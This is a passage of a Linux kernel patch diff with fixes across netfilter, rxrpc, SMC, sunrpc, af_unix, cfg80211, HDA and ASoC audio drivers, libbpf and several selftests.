+ 
+-static const struct nft_object_type *__nft_obj_type_get(u32 objtype)
++static const struct nft_object_type *__nft_obj_type_get(u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
+ 	list_for_each_entry(type, &nf_tables_objects, list) {
++		if (type->family != NFPROTO_UNSPEC &&
++		    type->family != family)
++			continue;
++
+ 		if (objtype == type->type)
+ 			return type;
+ 	}
+@@ -7141,11 +7145,11 @@ static const struct nft_object_type *__nft_obj_type_get(u32 objtype)
+ }
+ 
+ static const struct nft_object_type *
+-nft_obj_type_get(struct net *net, u32 objtype)
++nft_obj_type_get(struct net *net, u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
+-	type = __nft_obj_type_get(objtype);
++	type = __nft_obj_type_get(objtype, family);
+ 	if (type != NULL && try_module_get(type->owner))
+ 		return type;
+ 
+@@ -7238,7 +7242,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
+ 			return -EOPNOTSUPP;
+ 
+-		type = __nft_obj_type_get(objtype);
++		type = __nft_obj_type_get(objtype, family);
+ 		if (WARN_ON_ONCE(!type))
+ 			return -ENOENT;
+ 
+@@ -7252,7 +7256,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (!nft_use_inc(&table->use))
+ 		return -EMFILE;
+ 
+-	type = nft_obj_type_get(net, objtype);
++	type = nft_obj_type_get(net, objtype, family);
+ 	if (IS_ERR(type)) {
+ 		err = PTR_ERR(type);
+ 		goto err_type;
+diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
+index 641dc21f92b43..1101665f52537 100644
+--- a/net/netfilter/nft_ct.c
++++ b/net/netfilter/nft_ct.c
+@@ -1231,7 +1231,31 @@ static int nft_ct_expect_obj_init(const struct nft_ctx *ctx,
+ 	if (tb[NFTA_CT_EXPECT_L3PROTO])
+ 		priv->l3num = ntohs(nla_get_be16(tb[NFTA_CT_EXPECT_L3PROTO]));
+ 
++	switch (priv->l3num) {
++	case NFPROTO_IPV4:
++	case NFPROTO_IPV6:
++		if (priv->l3num != ctx->family)
++			return -EINVAL;
++
++		fallthrough;
++	case NFPROTO_INET:
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
+ 	priv->l4proto = nla_get_u8(tb[NFTA_CT_EXPECT_L4PROTO]);
++	switch (priv->l4proto) {
++	case IPPROTO_TCP:
++	case IPPROTO_UDP:
++	case IPPROTO_UDPLITE:
++	case IPPROTO_DCCP:
++	case IPPROTO_SCTP:
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
+ 	priv->dport = nla_get_be16(tb[NFTA_CT_EXPECT_DPORT]);
+ 	priv->timeout = nla_get_u32(tb[NFTA_CT_EXPECT_TIMEOUT]);
+ 	priv->size = nla_get_u8(tb[NFTA_CT_EXPECT_SIZE]);
+diff --git a/net/netfilter/nft_tunnel.c b/net/netfilter/nft_tunnel.c
+index 983ade4be3b39..efb505445eac1 100644
+--- a/net/netfilter/nft_tunnel.c
++++ b/net/netfilter/nft_tunnel.c
+@@ -713,6 +713,7 @@ static const struct nft_object_ops nft_tunnel_obj_ops = {
+ 
+ static struct nft_object_type nft_tunnel_obj_type __read_mostly = {
+ 	.type		= NFT_OBJECT_TUNNEL,
++	.family		= NFPROTO_NETDEV,
+ 	.ops		= &nft_tunnel_obj_ops,
+ 	.maxattr	= NFTA_TUNNEL_KEY_MAX,
+ 	.policy		= nft_tunnel_key_policy,
+diff --git a/net/rxrpc/conn_service.c b/net/rxrpc/conn_service.c
+index 6e6aa02c6f9e8..249353417a182 100644
+--- a/net/rxrpc/conn_service.c
++++ b/net/rxrpc/conn_service.c
+@@ -31,7 +31,7 @@ struct rxrpc_connection *rxrpc_find_service_conn_rcu(struct rxrpc_peer *peer,
+ 	struct rxrpc_conn_proto k;
+ 	struct rxrpc_skb_priv *sp = rxrpc_skb(skb);
+ 	struct rb_node *p;
+-	unsigned int seq = 0;
++	unsigned int seq = 1;
+ 
+ 	k.epoch	= sp->hdr.epoch;
+ 	k.cid	= sp->hdr.cid & RXRPC_CIDMASK;
+@@ -41,6 +41,7 @@ struct rxrpc_connection *rxrpc_find_service_conn_rcu(struct rxrpc_peer *peer,
+ 		 * under just the RCU read lock, so we have to check for
+ 		 * changes.
+ 		 */
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&peer->service_conn_lock, &seq);
+ 
+ 		p = rcu_dereference_raw(peer->service_conns.rb_node);
+diff --git a/net/smc/smc_clc.c b/net/smc/smc_clc.c
+index 9b8999e2afca5..867df45228152 100644
+--- a/net/smc/smc_clc.c
++++ b/net/smc/smc_clc.c
+@@ -155,10 +155,12 @@ static int smc_clc_ueid_remove(char *ueid)
+ 			rc = 0;
+ 		}
+ 	}
++#if IS_ENABLED(CONFIG_S390)
+ 	if (!rc && !smc_clc_eid_table.ueid_cnt) {
+ 		smc_clc_eid_table.seid_enabled = 1;
+ 		rc = -EAGAIN;	/* indicate success and enabling of seid */
+ 	}
++#endif
+ 	write_unlock(&smc_clc_eid_table.lock);
+ 	return rc;
+ }
+@@ -273,22 +275,30 @@ err:
+ 
+ int smc_nl_enable_seid(struct sk_buff *skb, struct genl_info *info)
+ {
++#if IS_ENABLED(CONFIG_S390)
+ 	write_lock(&smc_clc_eid_table.lock);
+ 	smc_clc_eid_table.seid_enabled = 1;
+ 	write_unlock(&smc_clc_eid_table.lock);
+ 	return 0;
++#else
++	return -EOPNOTSUPP;
++#endif
+ }
+ 
+ int smc_nl_disable_seid(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	int rc = 0;
+ 
++#if IS_ENABLED(CONFIG_S390)
+ 	write_lock(&smc_clc_eid_table.lock);
+ 	if (!smc_clc_eid_table.ueid_cnt)
+ 		rc = -ENOENT;
+ 	else
+ 		smc_clc_eid_table.seid_enabled = 0;
+ 	write_unlock(&smc_clc_eid_table.lock);
++#else
++	rc = -EOPNOTSUPP;
++#endif
+ 	return rc;
+ }
+ 
+@@ -1168,7 +1178,11 @@ void __init smc_clc_init(void)
+ 	INIT_LIST_HEAD(&smc_clc_eid_table.list);
+ 	rwlock_init(&smc_clc_eid_table.lock);
+ 	smc_clc_eid_table.ueid_cnt = 0;
++#if IS_ENABLED(CONFIG_S390)
+ 	smc_clc_eid_table.seid_enabled = 1;
++#else
++	smc_clc_eid_table.seid_enabled = 0;
++#endif
+ }
+ 
+ void smc_clc_exit(void)
+diff --git a/net/sunrpc/xprtmultipath.c b/net/sunrpc/xprtmultipath.c
+index 74ee2271251e3..720d3ba742ec0 100644
+--- a/net/sunrpc/xprtmultipath.c
++++ b/net/sunrpc/xprtmultipath.c
+@@ -336,8 +336,9 @@ struct rpc_xprt *xprt_iter_current_entry_offline(struct rpc_xprt_iter *xpi)
+ 			xprt_switch_find_current_entry_offline);
+ }
+ 
+-bool rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
+-			      const struct sockaddr *sap)
++static
++bool __rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
++				const struct sockaddr *sap)
+ {
+ 	struct list_head *head;
+ 	struct rpc_xprt *pos;
+@@ -356,6 +357,18 @@ bool rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
+ 	return false;
+ }
+ 
++bool rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
++			      const struct sockaddr *sap)
++{
++	bool res;
++
++	rcu_read_lock();
++	res = __rpc_xprt_switch_has_addr(xps, sap);
++	rcu_read_unlock();
++
++	return res;
++}
++
+ static
+ struct rpc_xprt *xprt_switch_find_next_entry(struct list_head *head,
+ 		const struct rpc_xprt *cur, bool check_active)
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index be2ed7b0fe21c..e1af94393789f 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1322,13 +1322,11 @@ static void unix_state_double_lock(struct sock *sk1, struct sock *sk2)
+ 		unix_state_lock(sk1);
+ 		return;
+ 	}
+-	if (sk1 < sk2) {
+-		unix_state_lock(sk1);
+-		unix_state_lock_nested(sk2);
+-	} else {
+-		unix_state_lock(sk2);
+-		unix_state_lock_nested(sk1);
+-	}
++	if (sk1 > sk2)
++		swap(sk1, sk2);
++
++	unix_state_lock(sk1);
++	unix_state_lock_nested(sk2, U_LOCK_SECOND);
+ }
+ 
+ static void unix_state_double_unlock(struct sock *sk1, struct sock *sk2)
+@@ -1559,7 +1557,7 @@ restart:
+ 		goto out_unlock;
+ 	}
+ 
+-	unix_state_lock_nested(sk);
++	unix_state_lock_nested(sk, U_LOCK_SECOND);
+ 
+ 	if (sk->sk_state != st) {
+ 		unix_state_unlock(sk);
+diff --git a/net/unix/diag.c b/net/unix/diag.c
+index 616b55c5b8908..3438b7af09af5 100644
+--- a/net/unix/diag.c
++++ b/net/unix/diag.c
+@@ -84,7 +84,7 @@ static int sk_diag_dump_icons(struct sock *sk, struct sk_buff *nlskb)
+ 			 * queue lock. With the other's queue locked it's
+ 			 * OK to lock the state.
+ 			 */
+-			unix_state_lock_nested(req);
++			unix_state_lock_nested(req, U_LOCK_DIAG);
+ 			peer = unix_sk(req)->peer;
+ 			buf[i++] = (peer ? sock_i_ino(peer) : 0);
+ 			unix_state_unlock(req);
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index b7e1631b3d80d..3ad4c1032c038 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -1810,8 +1810,12 @@ cfg80211_bss_update(struct cfg80211_registered_device *rdev,
+ 				list_add(&new->hidden_list,
+ 					 &hidden->hidden_list);
+ 				hidden->refcount++;
++
++				ies = (void *)rcu_access_pointer(new->pub.beacon_ies);
+ 				rcu_assign_pointer(new->pub.beacon_ies,
+ 						   hidden->pub.beacon_ies);
++				if (ies)
++					kfree_rcu(ies, rcu_head);
+ 			}
+ 		} else {
+ 			/*
+diff --git a/sound/hda/hdac_stream.c b/sound/hda/hdac_stream.c
+index 741a5d17ae4cb..ecd3aec57c87b 100644
+--- a/sound/hda/hdac_stream.c
++++ b/sound/hda/hdac_stream.c
+@@ -629,17 +629,15 @@ void snd_hdac_stream_timecounter_init(struct hdac_stream *azx_dev,
+ 	struct hdac_stream *s;
+ 	bool inited = false;
+ 	u64 cycle_last = 0;
+-	int i = 0;
+ 
+ 	list_for_each_entry(s, &bus->stream_list, list) {
+-		if (streams & (1 << i)) {
++		if ((streams & (1 << s->index))) {
+ 			azx_timecounter_init(s, inited, cycle_last);
+ 			if (!inited) {
+ 				inited = true;
+ 				cycle_last = s->tc.cycle_last;
+ 			}
+ 		}
+-		i++;
+ 	}
+ 
+ 	snd_pcm_gettime(runtime, &runtime->trigger_tstamp);
+@@ -684,14 +682,13 @@ void snd_hdac_stream_sync(struct hdac_stream *azx_dev, bool start,
+ 			  unsigned int streams)
+ {
+ 	struct hdac_bus *bus = azx_dev->bus;
+-	int i, nwait, timeout;
++	int nwait, timeout;
+ 	struct hdac_stream *s;
+ 
+ 	for (timeout = 5000; timeout; timeout--) {
+ 		nwait = 0;
+-		i = 0;
+ 		list_for_each_entry(s, &bus->stream_list, list) {
+-			if (!(streams & (1 << i++)))
++			if (!(streams & (1 << s->index)))
+ 				continue;
+ 
+ 			if (start) {
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 5aaf3dcecf27e..a26f2a2d44cf2 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -2549,6 +2549,8 @@ static const struct pci_device_id azx_ids[] = {
+ 	/* Lunarlake-P */
+ 	{ PCI_DEVICE(0x8086, 0xa828),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE},
++	/* Arrow Lake */
++	{ PCI_DEVICE_DATA(INTEL, HDA_ARL, AZX_DRIVER_SKL | AZX_DCAPS_INTEL_SKYLAKE) },
+ 	/* Broxton-P(Apollolake) */
+ 	{ PCI_DEVICE(0x8086, 0x5a98),
+ 	  .driver_data = AZX_DRIVER_SKL | AZX_DCAPS_INTEL_BROXTON },
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index a889cccdd607c..e8819e8a98763 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -21,6 +21,12 @@
+ #include "hda_jack.h"
+ #include "hda_generic.h"
+ 
++enum {
++	CX_HEADSET_NOPRESENT = 0,
++	CX_HEADSET_PARTPRESENT,
++	CX_HEADSET_ALLPRESENT,
++};
++
+ struct conexant_spec {
+ 	struct hda_gen_spec gen;
+ 
+@@ -42,7 +48,8 @@ struct conexant_spec {
+ 	unsigned int gpio_led;
+ 	unsigned int gpio_mute_led_mask;
+ 	unsigned int gpio_mic_led_mask;
+-
++	unsigned int headset_present_flag;
++	bool is_cx8070_sn6140;
+ };
+ 
+ 
+@@ -164,6 +171,27 @@ static void cxt_init_gpio_led(struct hda_codec *codec)
+ 	}
+ }
+ 
++static void cx_fixup_headset_recog(struct hda_codec *codec)
++{
++	unsigned int mic_persent;
++
++	/* fix some headset type recognize fail issue, such as EDIFIER headset */
++	/* set micbiasd output current comparator threshold from 66% to 55%. */
++	snd_hda_codec_write(codec, 0x1c, 0, 0x320, 0x010);
++	/* set OFF voltage for DFET from -1.2V to -0.8V, set headset micbias registor
++	 * value adjustment trim from 2.2K ohms to 2.0K ohms.
++	 */
++	snd_hda_codec_write(codec, 0x1c, 0, 0x3b0, 0xe10);
++	/* fix reboot headset type recognize fail issue */
++	mic_persent = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_PIN_SENSE, 0x0);
++	if (mic_persent & AC_PINSENSE_PRESENCE)
++		/* enable headset mic VREF */
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x24);
++	else
++		/* disable headset mic VREF */
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
++}
++
+ static int cx_auto_init(struct hda_codec *codec)
+ {
+ 	struct conexant_spec *spec = codec->spec;
+@@ -174,6 +202,9 @@ static int cx_auto_init(struct hda_codec *codec)
+ 	cxt_init_gpio_led(codec);
+ 	snd_hda_apply_fixup(codec, HDA_FIXUP_ACT_INIT);
+ 
++	if (spec->is_cx8070_sn6140)
++		cx_fixup_headset_recog(codec);
++
+ 	return 0;
+ }
+ 
+@@ -192,6 +223,77 @@ static void cx_auto_free(struct hda_codec *codec)
+ 	snd_hda_gen_free(codec);
+ }
+ 
++static void cx_process_headset_plugin(struct hda_codec *codec)
++{
++	unsigned int val;
++	unsigned int count = 0;
++
++	/* Wait headset detect done. */
++	do {
++		val = snd_hda_codec_read(codec, 0x1c, 0, 0xca0, 0x0);
++		if (val & 0x080) {
++			codec_dbg(codec, "headset type detect done!\n");
++			break;
++		}
++		msleep(20);
++		count++;
++	} while (count < 3);
++	val = snd_hda_codec_read(codec, 0x1c, 0, 0xcb0, 0x0);
++	if (val & 0x800) {
++		codec_dbg(codec, "headset plugin, type is CTIA\n");
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x24);
++	} else if (val & 0x400) {
++		codec_dbg(codec, "headset plugin, type is OMTP\n");
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x24);
++	} else {
++		codec_dbg(codec, "headphone plugin\n");
++	}
++}
++
++static void cx_update_headset_mic_vref(struct hda_codec *codec, unsigned int res)
++{
++	unsigned int phone_present, mic_persent, phone_tag, mic_tag;
++	struct conexant_spec *spec = codec->spec;
++
++	/* In cx8070 and sn6140, the node 16 can only be config to headphone or disabled,
++	 * the node 19 can only be config to microphone or disabled.
++	 * Check hp&mic tag to process headset pulgin&plugout.
++	 */
++	phone_tag = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
++	mic_tag = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
++	if ((phone_tag & (res >> AC_UNSOL_RES_TAG_SHIFT)) ||
++	    (mic_tag & (res >> AC_UNSOL_RES_TAG_SHIFT))) {
++		phone_present = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_PIN_SENSE, 0x0);
++		if (!(phone_present & AC_PINSENSE_PRESENCE)) {/* headphone plugout */
++			spec->headset_present_flag = CX_HEADSET_NOPRESENT;
++			snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
++			return;
++		}
++		if (spec->headset_present_flag == CX_HEADSET_NOPRESENT) {
++			spec->headset_present_flag = CX_HEADSET_PARTPRESENT;
++		} else if (spec->headset_present_flag == CX_HEADSET_PARTPRESENT) {
++			mic_persent = snd_hda_codec_read(codec, 0x19, 0,
++							 AC_VERB_GET_PIN_SENSE, 0x0);
++			/* headset is present */
++			if ((phone_present & AC_PINSENSE_PRESENCE) &&
++			    (mic_persent & AC_PINSENSE_PRESENCE)) {
++				cx_process_headset_plugin(codec);
++				spec->headset_present_flag = CX_HEADSET_ALLPRESENT;
++			}
++		}
++	}
++}
++
++static void cx_jack_unsol_event(struct hda_codec *codec, unsigned int res)
++{
++	struct conexant_spec *spec = codec->spec;
++
++	if (spec->is_cx8070_sn6140)
++		cx_update_headset_mic_vref(codec, res);
++
++	snd_hda_jack_unsol_event(codec, res);
++}
++
+ #ifdef CONFIG_PM
+ static int cx_auto_suspend(struct hda_codec *codec)
+ {
+@@ -205,7 +307,7 @@ static const struct hda_codec_ops cx_auto_patch_ops = {
+ 	.build_pcms = snd_hda_gen_build_pcms,
+ 	.init = cx_auto_init,
+ 	.free = cx_auto_free,
+-	.unsol_event = snd_hda_jack_unsol_event,
++	.unsol_event = cx_jack_unsol_event,
+ #ifdef CONFIG_PM
+ 	.suspend = cx_auto_suspend,
+ 	.check_power_status = snd_hda_gen_check_power_status,
+@@ -1042,6 +1144,15 @@ static int patch_conexant_auto(struct hda_codec *codec)
+ 	codec->spec = spec;
+ 	codec->patch_ops = cx_auto_patch_ops;
+ 
++	/* init cx8070/sn6140 flag and reset headset_present_flag */
++	switch (codec->core.vendor_id) {
++	case 0x14f11f86:
++	case 0x14f11f87:
++		spec->is_cx8070_sn6140 = true;
++		spec->headset_present_flag = CX_HEADSET_NOPRESENT;
++		break;
++	}
++
+ 	cx_auto_parse_eapd(codec);
+ 	spec->gen.own_eapd_ctl = 1;
+ 
+diff --git a/sound/soc/amd/acp-config.c b/sound/soc/amd/acp-config.c
+index 0932473b63945..9ee71a99a0871 100644
+--- a/sound/soc/amd/acp-config.c
++++ b/sound/soc/amd/acp-config.c
+@@ -3,7 +3,7 @@
+ // This file is provided under a dual BSD/GPLv2 license. When using or
+ // redistributing this file, you may do so under either license.
+ //
+-// Copyright(c) 2021 Advanced Micro Devices, Inc.
++// Copyright(c) 2021, 2023 Advanced Micro Devices, Inc.
+ //
+ // Authors: Ajit Kumar Pandey <AjitKumar.Pandey@amd.com>
+ //
+@@ -35,6 +35,19 @@ static const struct config_entry config_table[] = {
+ 			{}
+ 		},
+ 	},
++	{
++		.flags = FLAG_AMD_LEGACY,
++		.device = ACP_PCI_DEV_ID,
++		.dmi_table = (const struct dmi_system_id []) {
++			{
++				.matches = {
++					DMI_MATCH(DMI_SYS_VENDOR, "Valve"),
++					DMI_MATCH(DMI_PRODUCT_NAME, "Jupiter"),
++				},
++			},
++			{}
++		},
++	},
+ 	{
+ 		.flags = FLAG_AMD_SOF,
+ 		.device = ACP_PCI_DEV_ID,
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 2ccc68513f7c1..bb9de5767ebcd 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -1581,7 +1581,6 @@ static int wsa_macro_enable_interpolator(struct snd_soc_dapm_widget *w,
+ 	u16 gain_reg;
+ 	u16 reg;
+ 	int val;
+-	int offset_val = 0;
+ 	struct wsa_macro *wsa = snd_soc_component_get_drvdata(component);
+ 
+ 	if (w->shift == WSA_MACRO_COMP1) {
+@@ -1620,10 +1619,8 @@ static int wsa_macro_enable_interpolator(struct snd_soc_dapm_widget *w,
+ 					CDC_WSA_RX1_RX_PATH_MIX_SEC0,
+ 					CDC_WSA_RX_PGA_HALF_DB_MASK,
+ 					CDC_WSA_RX_PGA_HALF_DB_ENABLE);
+-			offset_val = -2;
+ 		}
+ 		val = snd_soc_component_read(component, gain_reg);
+-		val += offset_val;
+ 		snd_soc_component_write(component, gain_reg, val);
+ 		wsa_macro_config_ear_spkr_gain(component, wsa,
+ 						event, gain_reg);
+@@ -1651,10 +1648,6 @@ static int wsa_macro_enable_interpolator(struct snd_soc_dapm_widget *w,
+ 					CDC_WSA_RX1_RX_PATH_MIX_SEC0,
+ 					CDC_WSA_RX_PGA_HALF_DB_MASK,
+ 					CDC_WSA_RX_PGA_HALF_DB_DISABLE);
+-			offset_val = 2;
+-			val = snd_soc_component_read(component, gain_reg);
+-			val += offset_val;
+-			snd_soc_component_write(component, gain_reg, val);
+ 		}
+ 		wsa_macro_config_ear_spkr_gain(component, wsa,
+ 						event, gain_reg);
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index b152f4e5c4f2b..cd96c35a150c8 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1102,7 +1102,11 @@ static int wsa_dev_mode_put(struct snd_kcontrol *kcontrol,
+ 	return 1;
+ }
+ 
+-static const DECLARE_TLV_DB_SCALE(pa_gain, -300, 150, -300);
++static const SNDRV_CTL_TLVD_DECLARE_DB_RANGE(pa_gain,
++	0, 14, TLV_DB_SCALE_ITEM(-300, 0, 0),
++	15, 29, TLV_DB_SCALE_ITEM(-300, 150, 0),
++	30, 31, TLV_DB_SCALE_ITEM(1800, 0, 0),
++);
+ 
+ static int wsa883x_get_swr_port(struct snd_kcontrol *kcontrol,
+ 				struct snd_ctl_elem_value *ucontrol)
+diff --git a/tools/build/feature/test-libopencsd.c b/tools/build/feature/test-libopencsd.c
+index eb6303ff446ed..4cfcef9da3e43 100644
+--- a/tools/build/feature/test-libopencsd.c
++++ b/tools/build/feature/test-libopencsd.c
+@@ -4,9 +4,9 @@
+ /*
+  * Check OpenCSD library version is sufficient to provide required features
+  */
+-#define OCSD_MIN_VER ((1 << 16) | (1 << 8) | (1))
++#define OCSD_MIN_VER ((1 << 16) | (2 << 8) | (1))
+ #if !defined(OCSD_VER_NUM) || (OCSD_VER_NUM < OCSD_MIN_VER)
+-#error "OpenCSD >= 1.1.1 is required"
++#error "OpenCSD >= 1.2.1 is required"
+ #endif
+ 
+ int main(void)
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index 10f15a3e3a95e..e2014b1250ea2 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -4157,6 +4157,8 @@ bpf_object__collect_prog_relos(struct bpf_object *obj, Elf64_Shdr *shdr, Elf_Dat
+ 
+ 	scn = elf_sec_by_idx(obj, sec_idx);
+ 	scn_data = elf_sec_data(obj, scn);
++	if (!scn_data)
++		return -LIBBPF_ERRNO__FORMAT;
+ 
+ 	relo_sec_name = elf_sec_str(obj, shdr->sh_name);
+ 	sec_name = elf_sec_name(obj, scn);
+diff --git a/tools/lib/subcmd/help.c b/tools/lib/subcmd/help.c
+index bf02d62a3b2b5..42f57b640f119 100644
+--- a/tools/lib/subcmd/help.c
++++ b/tools/lib/subcmd/help.c
+@@ -50,11 +50,21 @@ void uniq(struct cmdnames *cmds)
+ 	if (!cmds->cnt)
+ 		return;
+ 
+-	for (i = j = 1; i < cmds->cnt; i++)
+-		if (strcmp(cmds->names[i]->name, cmds->names[i-1]->name))
+-			cmds->names[j++] = cmds->names[i];
+-
++	for (i = 1; i < cmds->cnt; i++) {
++		if (!strcmp(cmds->names[i]->name, cmds->names[i-1]->name))
++			zfree(&cmds->names[i - 1]);
++	}
++	for (i = 0, j = 0; i < cmds->cnt; i++) {
++		if (cmds->names[i]) {
++			if (i == j)
++				j++;
++			else
++				cmds->names[j++] = cmds->names[i];
++		}
++	}
+ 	cmds->cnt = j;
++	while (j < i)
++		cmds->names[j++] = NULL;
+ }
+ 
+ void exclude_cmds(struct cmdnames *cmds, struct cmdnames *excludes)
+diff --git a/tools/testing/selftests/bpf/cgroup_helpers.c b/tools/testing/selftests/bpf/cgroup_helpers.c
+index e914cc45b7669..6f00bee917a0b 100644
+--- a/tools/testing/selftests/bpf/cgroup_helpers.c
++++ b/tools/testing/selftests/bpf/cgroup_helpers.c
+@@ -467,10 +467,20 @@ int setup_classid_environment(void)
+ 		return 1;
+ 	}
+ 
+-	if (mount("net_cls", NETCLS_MOUNT_PATH, "cgroup", 0, "net_cls") &&
+-	    errno != EBUSY) {
+-		log_err("mount cgroup net_cls");
+-		return 1;
++	if (mount("net_cls", NETCLS_MOUNT_PATH, "cgroup", 0, "net_cls")) {
++		if (errno != EBUSY) {
++			log_err("mount cgroup net_cls");
++			return 1;
++		}
++
++		if (rmdir(NETCLS_MOUNT_PATH)) {
++			log_err("rmdir cgroup net_cls");
++			return 1;
++		}
++		if (umount(CGROUP_MOUNT_DFLT)) {
++			log_err("umount cgroup base");
++			return 1;
++		}
+ 	}
+ 
+ 	cleanup_classid_environment();
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf.c b/tools/testing/selftests/bpf/prog_tests/btf.c
+index d711f4bea98ea..47cb753ef1e3a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/btf.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf.c
+@@ -5211,6 +5211,7 @@ static size_t get_pprint_mapv_size(enum pprint_mapv_kind_t mapv_kind)
+ #endif
+ 
+ 	assert(0);
++	return 0;
+ }
+ 
+ static void set_pprint_mapv(enum pprint_mapv_kind_t mapv_kind,
+diff --git a/tools/testing/selftests/bpf/progs/pyperf180.c b/tools/testing/selftests/bpf/progs/pyperf180.c
+index c39f559d3100e..42c4a8b62e360 100644
+--- a/tools/testing/selftests/bpf/progs/pyperf180.c
++++ b/tools/testing/selftests/bpf/progs/pyperf180.c
+@@ -1,4 +1,26 @@
+ // SPDX-License-Identifier: GPL-2.0
+ // Copyright (c) 2019 Facebook
+ #define STACK_MAX_LEN 180
++
++/* llvm upstream commit at clang18
++ *   https://github.com/llvm/llvm-project/commit/1a2e77cf9e11dbf56b5720c607313a566eebb16e
++ * changed inlining behavior and caused compilation failure as some branch
++ * target distance exceeded 16bit representation which is the maximum for
++ * cpu v1/v2/v3. Macro __BPF_CPU_VERSION__ is later implemented in clang18
++ * to specify which cpu version is used for compilation. So a smaller
++ * unroll_count can be set if __BPF_CPU_VERSION__ is less than 4, which
++ * reduced some branch target distances and resolved the compilation failure.
++ *
++ * To capture the case where a developer/ci uses clang18 but the corresponding
++ * repo checkpoint does not have __BPF_CPU_VERSION__, a smaller unroll_count
++ * will be set as well to prevent potential compilation failures.
++ */
++#ifdef __BPF_CPU_VERSION__
++#if __BPF_CPU_VERSION__ < 4
++#define UNROLL_COUNT 90
++#endif
++#elif __clang_major__ == 18
++#define UNROLL_COUNT 90
++#endif
++
+ #include "pyperf.h"
+diff --git a/tools/testing/selftests/drivers/net/bonding/lag_lib.sh b/tools/testing/selftests/drivers/net/bonding/lag_lib.sh
+index 16c7fb858ac10..696ef9bf3afc4 100644
+--- a/tools/testing/selftests/drivers/net/bonding/lag_lib.sh
++++ b/tools/testing/selftests/drivers/net/bonding/lag_lib.sh
+@@ -46,6 +46,17 @@ test_LAG_cleanup()
+ 	ip link add mv0 link "$name" up address "$ucaddr" type macvlan
+ 	# Used to test dev->mc handling
+ 	ip address add "$addr6" dev "$name"
++
++	# Check that addresses were added as expected
++	(grep_bridge_fdb "$ucaddr" bridge fdb show dev dummy1 ||
++		grep_bridge_fdb "$ucaddr" bridge fdb show dev dummy2) >/dev/null
++	check_err $? "macvlan unicast address not found on a slave"
++
++	# mcaddr is added asynchronously by addrconf_dad_work(), use busywait
++	(busywait 10000 grep_bridge_fdb "$mcaddr" bridge fdb show dev dummy1 ||
++		grep_bridge_fdb "$mcaddr" bridge fdb show dev dummy2) >/dev/null
++	check_err $? "IPv6 solicited-node multicast mac address not found on a slave"
++
+ 	ip link set dev "$name" down
+ 	ip link del "$name"
+ 
+diff --git a/tools/testing/selftests/drivers/net/team/config b/tools/testing/selftests/drivers/net/team/config
+index 265b6882cc21e..b5e3a3aad4bfb 100644
+--- a/tools/testing/selftests/drivers/net/team/config
++++ b/tools/testing/selftests/drivers/net/team/config
+@@ -1,3 +1,5 @@
++CONFIG_DUMMY=y
++CONFIG_IPV6=y
++CONFIG_MACVLAN=y
+ CONFIG_NET_TEAM=y
+ CONFIG_NET_TEAM_MODE_LOADBALANCE=y
+-CONFIG_MACVLAN=y
+diff --git a/tools/testing/selftests/net/config b/tools/testing/selftests/net/config
+index bd89198cd8176..ec097f2457265 100644
+--- a/tools/testing/selftests/net/config
++++ b/tools/testing/selftests/net/config
+@@ -13,6 +13,7 @@ CONFIG_IPV6_VTI=y
+ CONFIG_DUMMY=y
+ CONFIG_BRIDGE=y
+ CONFIG_VLAN_8021Q=y
++CONFIG_GENEVE=m
+ CONFIG_IFB=y
+ CONFIG_NETFILTER=y
+ CONFIG_NETFILTER_ADVANCED=y
